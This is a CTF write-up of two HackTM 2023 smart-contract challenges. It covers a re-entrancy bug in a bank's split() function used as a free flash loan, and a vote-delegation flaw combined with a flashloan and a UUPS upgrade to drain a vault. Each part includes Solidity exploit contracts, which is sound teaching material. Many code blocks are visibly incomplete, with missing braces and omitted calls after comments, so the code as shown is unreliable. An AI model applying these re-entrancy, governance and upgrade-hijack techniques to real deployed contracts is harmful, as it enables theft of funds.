Exploiting smart contracts in HackTM 2023 CTF Quals

14 minute read

This CTF had two smart contract challenges, Dragon Slayer and Diamond Heist.

Dragon Slayer

Prove yourself a true champion. Kill the mighty dragon and earn the right to call yourself a dragon slayer.

nc 30100

The contracts for this challenge can be found in dragon_slayer_contracts.zip.


We are provided with the following contracts:

  • Setup.sol: The contract used to setup the challenge and check if the challenge is solved.
  • Item.sol: An ERC-1155 contract that implements items equippable by our knight.
  • GoldCoin.sol: An ERC-20 contract that implements ERC-20 tokens, known as gold coins, which are used as fungible currency.
  • BankNote.sol: An ERC-721 contract that implements ERC-721 tokens, known as bank notes.

Shop.sol implements a contract to buy and sell items in exchange for gold coins. It sells the following items:

itemId itemType attack defence price
1 ItemType.SWORD 1 0 10 ether
2 ItemType.SHIELD 0 1 10 ether
3 ItemType.SWORD 1,000,000 0 1_000_000 ether
4 ItemType.SHIELD 0 1,000,000 1_000_000 ether

Dragon.sol implements a contract that represents the enemy character, which has the following attributes:

  • health: 1,000,000
  • clawAttack and fireAttack: 1,000,000
  • defense: 500,000

Knight.sol implements a contract that represents our player, which also has its own health, attack and defence attributes. The relevant functions in the contract are:

  • fightDragon(): Fights the dragon - receive an attack from the dragon and then attack it.
  • buyItem(), sellItem(): Buy and sell items from the shop. Items that are bought are equipped, which changes the attack and defence attributes of the knight.
  • bankDeposit(), bankTransferPartial(): Functions for the knight to interact with the Bank contract. Note that there are also other functions not listed here that interact with the Bank contract.

Bank.sol implements a Bank contract, which facillitates the exchange of gold coins for a non-fungible bank note. It has the following relevant functions:

  • deposit(): Deposit an amount of gold coins for a bank note.
  • withdraw(): Burn a bank note to withdraw its amount of gold coins.
  • merge(): Merge multiple bank notes into a new bank note.
  • split(): Split a single bank note into multiple new bank notes.
  • transferPartial(): Transfer an amount of gold coins from one bank note to another.

At the start of the challenge, the knight has only 10 ether gold coins. The knight is also equipped with items 1 and 2, thus he only has 1 attack and 1 defense.

Through the Setup contract, we are able to claim ownership of the knight:

function claim() external {
    require(!claimed, "ALREADY_CLAIMED");
    claimed = true;

To solve the challenge, we have to reduce the dragon’s health to 0 while our knight still has health:

function isSolved() external view returns (bool) {
    return knight.health() > 0 && knight.dragon().health() == 0;

Essentially, we have to fight the dragon with our knight and defeat it. However, due to the dragon’s high health, attack and defense attributes, the knight has to purchase and equip items 3 and 4 before fighting the dragon.

However, items 3 and 4 cost a total of 2_000_000 ether gold coins, which is way more than what we have initially. If only there was a way to create gold coins out of thin air…

The vulnerability

In the BankNote contract, the mint() function uses _safeMint():

function mint(address to, uint256 tokenId) public onlyOwner {
        _safeMint(to, tokenId);

safeMint() checks if the receiving address is capable of receiving ERC-721 tokens before minting the token. According to OpenZeppelin’s documentation:

If to refers to a smart contract, it must implement IERC721Receiver.onERC721Received, which is called upon a safe transfer.

This means that if the receiving address is a smart contract, it has to implement an onERC721Received() function, which is expected to return this.onERC721Received.selector.

In OpenZeppelin’s ERC-721 implementation, whenever a token is minted to a contract, _safeMint() calls _checkOnERC721Received(), which invokes the onERC721Received() function of the receiving contract. As such, when mint() is called in the BankNote contract, execution flow is passed to the receiving contract temporarily before the bank note is minted.

With this knowledge, we can spot a vulnerability in the split() function in Bank.sol:

function split(uint bankNoteIdFrom, uint[] memory amounts) external {
    uint totalValue;
    require(bankNote.ownerOf(bankNoteIdFrom) == msg.sender, "NOT_OWNER");
    for (uint i = 0; i < amounts.length; i++) {
        uint value = amounts[i];
        uint bankNoteId = _ids.current();
        bankNote.mint(msg.sender, bankNoteId);
        bankNoteValues[bankNoteId] = value;
        totalValue += value;
    require(totalValue == bankNoteValues[bankNoteIdFrom], "NOT_ENOUGH");
    bankNoteValues[bankNoteIdFrom] = 0;

Notice the following:

  • If msg.sender is a contract, bankNote.mint(msg.sender, bankNoteId) allows msg.sender to hijack execution flow temporarily through its onERC721Received() function.
  • The function mints all resulting bank notes with their values from amounts before checking that the value of bankNoteIdFrom is equal to the sum of amounts, as seen in the require statement.

As the function performs minting before the check, it violates the Checks-Effects-Interactions pattern, making it vulnerable to re-entrancy. This can be exploited to temporarily own any amount of gold coins:

  1. An attacker contract calls split() with the following arguments:
    • bankNoteIdFrom - a bank note with no value owned by the attacker. We’ll call this bankNoteA.
    • amount - [x, 0], where x can be any arbitrary amount of gold coins the attacker needs.
  2. In the first iteration of the for-loop in split():
    • When bankNote.mint() is called, the attacker does nothing in the onERC721Received() callback.
    • A new bank note is minted to the attacker and assigned the value x. We’ll call this bankNoteB.
  3. By the second iteration, the attacker owns bankNoteB, which has a value of goldCoinAmount. Thus, when bankNote.mint() is called again, the attacker does the following in the onERC721Received() callback:
    • Withdraws bankNoteB in exchange for x amount of gold coins and does whatever he wants with them.
    • Before onERC721Received() returns, the attacker has to deposit x amount of gold coins and transfer them to bankNoteA.
  4. When the for-loop terminates, the check at the end of split() passes as both totalValue and bankNoteValues[bankNoteIDFrom] equal to x.

For those who are familiar with smart contracts, this looks very similar to a flash loan. We can borrow any arbitrary amount of gold coins provided that we return them at the end of the function.

Solving the challenge

With the vulnerability above, solving the challenge becomes trivial. We create an attacker contract which does the following:

  1. Obtain a bank note: As our attacker contract has no gold coins, it cannot call deposit(). Instead, we call merge() with an empty array:
    // Get an empty banknote (id 1)
    uint[] memory bankNoteIDsFrom = new uint[](0);
  2. Exploit the vulnerability: We then call split() with our empty bank note and amount = [2_000_000 ether, 0] to gain 2_000_000 ether worth of gold coins:
    // Abuse bank.split() to "borrow" 2,000,000 ether
    uint[] memory amounts = new uint[](2);
    amounts[0] = goldCoinAmount;
    bank.split(1, amounts);
  3. Fight the dragon: In the second callback to onERC721Received(), we do the following:
    1. Withdraw our 2_000_000 ether gold coins from the bank note.
    2. Transfer all gold coins to the knight.
    3. Knight buys items 3 and 4 with all the gold coins.
    4. Knight fights the dragon until its health is 0.
    5. Knight sells items 3 and 4 to gain back the 2_000_000 ether gold coins.
    6. Knight deposits the gold coins and transfers it to the attacker contract’s bank note.

Exploit code

Exploit.sol, which contains the full exploit code, is as shown:

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "./dragon_slayer_contracts/Setup.sol";
import "./dragon_slayer_contracts/Knight.sol";
import "./dragon_slayer_contracts/Dragon.sol";
import "./dragon_slayer_contracts/Bank.sol";
import "./dragon_slayer_contracts/GoldCoin.sol";

contract Exploit {
    // Challenge contracts
    Setup public setup;
    Knight public knight;
    Dragon public dragon;
    Bank public bank;
    GoldCoin public goldCoin;

    // Counts the number of times onERC721Received is called
    uint256 hitCount;

    // Amount of gold coins required to solve the challenge
    uint256 constant goldCoinAmount = 2_000_000 ether;

    constructor(Setup _setup) {
        // Initialize challenge contracts
        setup = _setup;
        knight = setup.knight();
        dragon = knight.dragon();
        bank = knight.bank();
        goldCoin = bank.goldCoin();

        // Claim ownership of Knight contract

    function exploit() public {
        // Get an empty banknote (id 1)
        uint[] memory bankNoteIDsFrom = new uint[](0);

        // Abuse bank.split() to "borrow" 2,000,000 ether
        uint[] memory amounts = new uint[](2);
        amounts[0] = goldCoinAmount;
        bank.split(1, amounts);

    function onERC721Received(address, address, uint256, bytes calldata) public returns (bytes4) {
        // Only perform the exploit on the third onERC721Received call
        if (hitCount == 2) {
            // Withdraw all gold coins from banknote (id 2)

            // Transfer all coins to Knight
            goldCoin.transfer(address(knight), goldCoinAmount);
            // Buy items 3 and 4

            // Fight Dragon until its health is 0
            while (dragon.health() > 0) {

            // Sell items 3 and 4

            // Deposit gold coins into a new banknote (id 4)

            // Transfer all gold coins back to this contract's banknote (id 1)
            knight.bankTransferPartial(4, goldCoinAmount, 1);
        // Increment the counter by 1
        hitCount += 1;

        return this.onERC721Received.selector;


Diamond Heist

Salty Pretzel Swap DAO has recently come out with their new flashloan vaults. They have deposited all of their 100 Diamonds in one of their vaults.

Your mission, should you choose to accept it, is to break the vault and steal all of the diamonds. This would be one of the greatest heists of all time.

This text will self-destruct in ten seconds.

Good luck.

nc 30200

The contracts for this challenge can be found in diamond_heist_contracts.zip.


We are provided with the following contracts:

  • Setup.sol: The contract used to setup the challenge and check if the challenge is solved.
  • Diamond.sol: An ERC-20 contract that implements ERC-20 tokens known as diamonds.
  • Burner.sol: A contract which contains a selfdestruct call to itself. (This contract is not important)

SaltyPretzel.sol is an ERC-20 contract that implements a governance token contract. Essentially, owning more SaltyPretzel tokens would give a user more votes, which is useful in a system that implements governance. This contract will be explained more in-depth later on.

Vault.sol implements a Vault contract that is used to store diamonds. It is meant to be an proxy implementation contract as it follows the UUPSUpgradeable pattern. It has the following interesting functions:

  • governanceCall(): Allows the vault’s owner or anyone with sufficient votes to execute any of this contract’s functions.
  • flashloan(): A function to take out a flash loan of any token.

VaultFactory.sol contains a contract that deploys Vault as an ERC1967Proxy.

At the start of the challenge, 100 diamonds are transferred to the vault after it is initialized, as seen in Setup.sol:

uint constant public DIAMONDS = 100;
// ...
constructor () {
    vaultFactory = new VaultFactory();
    vault = vaultFactory.createVault(keccak256("The tea in Nepal is very hot."));
    diamond = new Diamond(DIAMONDS);
    saltyPretzel = new SaltyPretzel();
    vault.initialize(address(diamond), address(saltyPretzel));
    diamond.transfer(address(vault), DIAMONDS);

Using the claim() function, we are able to mint 100 ether worth of SaltyPretzel tokens for ourselves. This can only be done once:

uint constant public SALTY_PRETZELS = 100 ether;
// ...
function claim() external {
    claimed = true;
    saltyPretzel.mint(msg.sender, SALTY_PRETZELS);

To solve the challenge, the Setup contract must have a balance of 100 diamonds:

function isSolved() external view returns (bool) {
    return diamond.balanceOf(address(this)) == DIAMONDS;

As all the diamonds were transferred to the vault at the start of the challenge, we have to find a way to drain the vault of its 100 diamonds…

The vulnerability

The SaltyPretzel contract implements its own accounting system to keep track of everyone’s voting power. Users are also able to delegate their votes to another user, giving the delegatee more voting power.

At the core of this vote accounting system are the _delegate() and _moveDelegates() functions:

function _delegate(address delegator, address delegatee)
    address currentDelegate = _delegates[delegator];
    uint256 delegatorBalance = balanceOf(delegator);
    _delegates[delegator] = delegatee;
    emit DelegateChanged(delegator, currentDelegate, delegatee);
    _moveDelegates(currentDelegate, delegatee, delegatorBalance);
function _moveDelegates(address srcRep, address dstRep, uint256 amount) internal {
    if (srcRep != dstRep && amount > 0) {
        if (srcRep != address(0)) {
            uint32 srcRepNum = numCheckpoints[srcRep];
            uint256 srcRepOld = srcRepNum > 0 ? checkpoints[srcRep][srcRepNum - 1].votes : 0;
            uint256 srcRepNew = srcRepOld - amount;
            _writeCheckpoint(srcRep, srcRepNum, srcRepOld, srcRepNew);
        if (dstRep != address(0)) {
            uint32 dstRepNum = numCheckpoints[dstRep];
            uint256 dstRepOld = dstRepNum > 0 ? checkpoints[dstRep][dstRepNum - 1].votes : 0;
            uint256 dstRepNew = dstRepOld + amount;
            _writeCheckpoint(dstRep, dstRepNum, dstRepOld, dstRepNew);

_delegate() first sets the delegatee of delegator, then calls _moveDelegates() to transfer the balance of delegator (ie. his votes) from the old delegatee to the new one.

_moveDelegates() then subtracts amount votes from srcRep, which in this case, would be the old delegatee, and adds them to dstRep, which would be the new delegatee. Notice the following checks:

  • If srcRep == dstRep or amount == 0, the function does not do anything.
  • If srcRep == address(0), the votes are not deducted from srcRep.
  • If dstRep == address(0), the votes are not added to dstRep.

Users can also change their delegatee through the delegate() function:

function delegate(address delegatee) external {
    return _delegate(msg.sender, delegatee);

While looking at how _moveDelegates() is used, I noticed the following in mint():

function mint(address _to, uint256 _amount) public onlyOwner {
    _mint(_to, _amount);
    _moveDelegates(address(0), _delegates[_to], _amount);

When new tokens are minted, the contract has to “create” votes to increase the voting power of the recipient. To do so, mint() calls _moveDelegates() with srcRep as address(0), which does not deduct votes from srcRep but simply adds them to dstRep.

This gave me an idea - if we could set our delegatee to address(0), we would essentially be able to repeatedly create votes out of thin air, similar to mint(). Setting our delegatee to address(0) can be achieved by doing the following:

  1. Transfer our SaltyPretzel tokens to another contract to make our balance 0.
  2. Call delegate() with address(0) as our delegatee. This works as _delegate() would call _moveDelegates() with amount = 0, thus no transfer of votes occurs.

After setting delegatee to address(0), we are able to increase the voting power of any other user through the following:

  • Transfer our SaltyPretzel tokens back to our address.
  • Call delegate(), with delegatee as the user we wish to add votes to. Note that delegatee cannot be our own address as srcRep cannot be equal to dstRep in _moveDelegates(), as mentioned above.

Thereforce, by repeatedly setting our delegatee to address(0), then regaining our tokens and calling delegate(), we are able to increase anyone’s voting power by any arbitrary amount.

Solving the challenge

Now that we have the ability to gain infinite votes, how do we solve the challenge?

As Vault is a UUPSUpgradeable proxy contract, it inherits the an upgradeTo() function, which can be used to upgrade the implementation contract of Vault:

function upgradeTo(address newImplementation) external virtual onlyProxy {
    _upgradeToAndCallUUPS(newImplementation, new bytes(0), false);

The _authorizeUpgrade() function is overridden in the current implementation of Vault:

function _authorizeUpgrade(address) internal override view {
    require(msg.sender == owner() || msg.sender == address(this));
    require(IERC20(diamond).balanceOf(address(this)) == 0);

To change the implementation of Vault to our own contract, the following two requirements have to be met:

  1. msg.sender has to be either owner or Vault itself.
  2. Vault must have no diamonds.

Since the owner of Vault is the Setup contract, the first criteria can only be achieved by calling upgradeTo() through the Vault itself. Luckily for us, Vault contains a governanceCall() function:

function governanceCall(bytes calldata data) external {
    require(msg.sender == owner() || saltyPretzel.getCurrentVotes(msg.sender) >= AUTHORITY_THRESHOLD);
    (bool success,) = address(this).call(data);

As we now have the ability to gain infinite votes, we can make Vault call any of its functions through governanceCall(). To meet the first requirement, we simply use governanceCall() to call upgradeTo(), which would make msg.sender the Vault itself.

To fulfil the second criteria, we utilize the flashloan() function:

function flashloan(address token, uint amount, address receiver) external {
    uint balanceBefore = IERC20(token).balanceOf(address(this));
    IERC20(token).transfer(receiver, amount);
    IERC3156FlashBorrower(receiver).onFlashLoan(msg.sender, token, amount, 0, "");
    uint balanceAfter = IERC20(token).balanceOf(address(this));
    require(balanceBefore == balanceAfter);

We take out a flashloan to borrow all of Vault’s diamonds, and then make the governanceCall() -> upgradeTo() call in the onFlashLoan() callback. This way, when upgradeTo() is called, Vault will temporarily have no diamonds.

Exploit code

The exploit code contains three contracts:

  • Exploit mainly handles abusing the vulnerability to gain sufficient votes.
  • VoteCollector is used to solve the challenge after it has enough votes.
  • FakeVault is the new vault implementation used to drain the vault.


// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "./diamond_heist_contracts/Setup.sol";
import "./diamond_heist_contracts/Vault.sol";
import "./diamond_heist_contracts/Diamond.sol";
import "./diamond_heist_contracts/SaltyPretzel.sol";

contract Exploit {
    // Challenge contracts
    Setup public setup;
    Vault public vault;
    SaltyPretzel public saltyPretzel;

    constructor(Setup _setup) {
        // Initialize challenge contracts
        setup = _setup;
        vault = setup.vault();
        saltyPretzel = setup.saltyPretzel();

        // Claim initial SaltyPretzel tokens

    function exploit() public {
        // Create a contract contract to hoard votes
        VoteCollector voteCollector = new VoteCollector(setup);

        // Loop while VoteCollector has not enough votes
        while (saltyPretzel.getCurrentVotes(address(voteCollector)) < vault.AUTHORITY_THRESHOLD()) {
            // Add our votes to VoteCollector 

            // Set our delegatee to address(0)
            saltyPretzel.transfer(address(voteCollector), setup.SALTY_PRETZELS());

            // Regain our SaltyPretzel tokens
            saltyPretzel.transferFrom(address(voteCollector), address(this), setup.SALTY_PRETZELS());

        // When VoteCollector has enough votes, steal the vault's diamonds

contract VoteCollector {
    // Challenge contracts
    Setup public setup;
    Vault public vault;
    Diamond public diamond;
    SaltyPretzel public saltyPretzel;

    constructor(Setup _setup) {
        // Initialize challenge contracts
        setup = _setup;
        vault = setup.vault();
        diamond = setup.diamond();
        saltyPretzel = setup.saltyPretzel();

        // Allow the Exploit contract to transfer all of this contract's SaltyPretzel tokens
        saltyPretzel.approve(msg.sender, type(uint256).max);

    function stealDiamonds() public {
        // Borrow a flashloan to temporarily set the vault's diamond balance to 0
        vault.flashloan(address(diamond), setup.DIAMONDS(), address(this));

        // After the vault is upgraded to FakeVault, transfer its diamonds to Setup

    function onFlashLoan(
        bytes calldata
    ) external returns(bytes32) {
        // Create a FakeVault contract
        FakeVault fakeVault = new FakeVault();

        // Upgrade the implementation of vault to FakeVault
        bytes memory data = abi.encodeWithSelector(vault.upgradeTo.selector, address(fakeVault));

        // Return the borrowed diamonds to vault
        diamond.transfer(address(vault), setup.DIAMONDS());

        return keccak256("ERC3156FlashBorrower.onFlashLoan");

contract FakeVault is Initializable, UUPSUpgradeable, OwnableUpgradeable {    
    // Keep the diamond state variable
    Diamond diamond;

    // Function to transfer all of the vault's diamonds
    function transferDiamonds(address to) public {
        diamond.transfer(to, diamond.balanceOf(address(this)));
    // _authorizeUpgrade has to be implemented for UUPSUpgradeable contracts
    function _authorizeUpgrade(address) internal override view {}

